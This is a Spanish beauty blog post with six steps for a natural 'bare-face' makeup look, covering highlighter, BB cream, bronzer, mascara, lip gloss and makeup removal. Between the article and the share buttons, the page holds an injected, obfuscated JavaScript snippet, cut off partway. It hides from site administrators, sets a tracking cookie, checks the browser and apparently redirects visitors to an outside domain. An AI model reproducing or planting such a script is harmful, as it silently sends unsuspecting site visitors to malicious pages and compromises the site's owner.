En maquillaje Nude está muy de moda en los últimos tiempos, ya que a todas nos gusta estar siempre impecable sin que se nos note que vamos maquilladas.

Sigue leyendo y descubre como maquillar tu rostro para obtener un look cara lavada. ¡Destaca tu belleza natural!

1-.) Ilumina tu rostro.

Debes aplicar un iluminador para que tu rostro muestre un aspecto descansado y uniforme. Utilízalo en la nariz, comisuras de los labios y en las pequeñas líneas de expresión. Para dar luz a tus ojos, aplica el producto en el lagrimal y zona inferior de las cejas.

2-.) Usa una BB Cream.

Este tipo de cremas tienen una cobertura ideal ultra ligera y no grasa, se absorben perfectamente y no tienen efecto máscara. Por lo que conseguirás un efecto de buena cara, además de aportar al rostro la hidratación que necesita.

3-.) Dale un toque de color a tu piel.

Si quieres prolongar tu bronceado durante más tiempo, aplica polvos de sol en pómulos, frente, nariz y mentón y conseguirás realzar el tono de tu piel.

4-.) Intensifica tu mirada con una máscara de pestañas.

Aplica varias capas de máscara en la parte superior e inferior de tus pestañas.

5-.) Aporta a tus labios un brillo natural.

Si lo deseas, también puedes aportar un leve toque de color a tus labios con un lip gloss hidratante, brillante y efecto look mojado. Opta por los tonos translúcidos o por un sutil color nude.

6-.) Desmaquilla y elimina los restos de suciedad.

Por supuesto, no olvides desmaquillar tu rostro a diario y descubrirás como en tan solo unos segundos consigues eliminar los restos de suciedad en una pasada. Hidrata, cuida y muestra una piel joven y sin imperfecciones.

¡Descubre el verdadero efecto cara lavada!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone